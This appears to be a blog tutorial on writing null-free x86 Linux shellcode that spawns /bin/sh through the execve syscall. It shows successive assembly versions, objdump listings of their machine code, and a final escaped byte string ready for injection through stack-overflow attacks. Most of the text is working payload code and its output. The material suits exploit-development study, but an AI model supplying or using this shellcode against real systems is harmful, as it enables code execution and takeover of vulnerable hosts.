Most probably you want your shellcode to execute "/bin/sh" on target box. Here you have to deal somehow with string, which in normal programs is stored in data section.
The problem you may face when you are writing a shellcode is that you can't just use data section in your shellode - your shellcode and target application use different data sections.
First of all I've tried to use call instruction. When processor executes call it automatically puts address of the next instruction into esp register. We can use this "feature" keeping in mind that call works with addresses, that means that we can use address of instruction rather than function's.
Let's look at the code below
1 2 .global main 3 4 main: 5 jmp two 6 one: 7 movl (%esp), %ebx 8 xor %eax, %eax 9 10 pushl %eax 11 pushl %ebx 12 movl %esp, %ecx 13 14 xorl %edx, %edx 15 16 movl $11, %eax 17 int $0x80 18 two: 19 call one 20 .string "/bin/sh"Just in the beginning processor jumps to label two. Then it executes call: puts address of the next instruction and jumps to label one. Here is the most interesting part. The address of the "next instruction" after the "call one" is our string.
So when we are already in label one we have address of the string "/bin/sh" in esp.
Then the code prepares registers for system call execve. Number of syscall execve(11) to eax, path to executable to ebx, argv array to ecx and envp array to edx. argv array I simulated with pushing values to stack and putting address of the top of the stack to ebx, I don't push any environment variables, so %edx is null.
This code is valid and will execute /bin/sh if you compile it and execute.
(~~) gcc test.s -o test (~~) ./test sh-3.2#The problem here is that it contains nulls:
080483b4 <main>: 80483b4: eb 12 jmp 80483c8 <two> 080483b6 <one>: 80483b6: 8b 1c 24 mov (%esp),%ebx 80483b9: 31 c0 xor %eax,%eax 80483bb: 50 push %eax 80483bc: 53 push %ebx 80483bd: 89 e1 mov %esp,%ecx 80483bf: 31 d2 xor %edx,%edx 80483c1: b8 0b 00 00 00 mov $0xb,%eax 80483c6: cd 80 int $0x80 080483c8 <two>: 80483c8: e8 e9 ff ff ff call 80483b6 <one> 80483cd: 2f das 80483ce: 62 69 6e bound %ebp,0x6e(%ecx) 80483d1: 2f das 80483d2: 73 68 jae 804843c <__libc_csu_init+0x4c> 80483d4: 00 90 90 90 90 90 add %dl,-0x6f6f6f70(%eax) 80483da: 90 nop 80483db: 90 nop 80483dc: 90 nop 80483dd: 90 nop 80483de: 90 nop 80483df: 90 nopAlmost all stack overflow attacks uses libc string function to overwrite execution point of function or return point with the chellcode. If shellcode contains null characters it could not be read to the end and the attack will fail.
The "main" null is in our string "/bin/sh". execve doesn't work with not a null-ending strings. I tried to make the string like "/bin/shx" and define it as ascii:
.ascii "/bin/shx"and later in runtime override the last character with null but all the time I got segmentation violation alert. I suppose that this is because I was trying to modify read-only section. This became a dead-end for me.
I decided to try another way of defining the string. String after all is an array of bytes. So we can just put these bytes somewhere else is some other representation.
Let's look at the string "/bin/sh" from the other side.
(~~) echo -n "/bin/sh" | hexdump 0000000 622f 6e69 732f 0068Aligned to 4 it still contain null, but this is not a problem, we can divide it into 2-bytes chunks:
622f,6e69,732f,68And now we can use word-long instructions. Let's look at the updated code of our shell program.
1 2 .global main 3 4 main: 5 xor %eax, %eax 6 7 pushl %eax 8 pushw $0x68 9 pushw $0x732f 10 pushw $0x6e69 11 pushw $0x622f 12 13 movl %esp, %ebx 14 15 pushl %eax 16 pushl %ebx 17 movl %esp, %ecx 18 19 xorl %edx, %edx 20 21 movl $11, %eax 22 int $0x80I've pushed word-long chunks of the string onto the stack(at first I've pushed zeroed eax to indicate end of string) and put moved address of the head of the stack to ebx. That's almost all. If you still try to compile this code you'd probably find out some zeros. That's because of the movl $11, %eax instruction. 11 could be hold in one byte-long memory node but movl will align memory to 4 bytes with zeros. So just changing from movl to movb will remove this last zero. The latest code should be like
1 2 .global main 3 4 main: 5 xor %eax, %eax 6 7 pushl %eax 8 pushw $0x68 9 pushw $0x732f 10 pushw $0x6e69 11 pushw $0x622f 12 13 movl %esp, %ebx 14 15 pushl %eax 16 pushl %ebx 17 movl %esp, %ecx 18 19 xorl %edx, %edx 20 21 movb $11, %al 22 int $0x80Compiling it and obtaining the machine codes I can see there is no zeros there:
080483b4 <main> 80483b4: 31 c0 xor %eax,%eax 80483b6: 50 push %eax 80483b7: 66 6a 68 pushw $0x68 80483ba: 66 68 2f 73 pushw $0x732f 80483be: 66 68 69 6e pushw $0x6e69 80483c2: 66 68 2f 62 pushw $0x622f 80483c6: 89 e3 mov %esp,%ebx 80483c8: 50 push %eax 80483c9: 53 push %ebx 80483ca: 89 e1 mov %esp,%ecx 80483cc: 31 d2 xor %edx,%edx 80483ce: b0 0b mov $0xb,%al 80483d0: cd 80 int $0x80The shellcode string will look like
"\x31\xc0\x50\x66\x6a\x68\x66\x68\x2f\x73\x66\x68\x69\x6e\x66" "\x68\x2f\x62\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"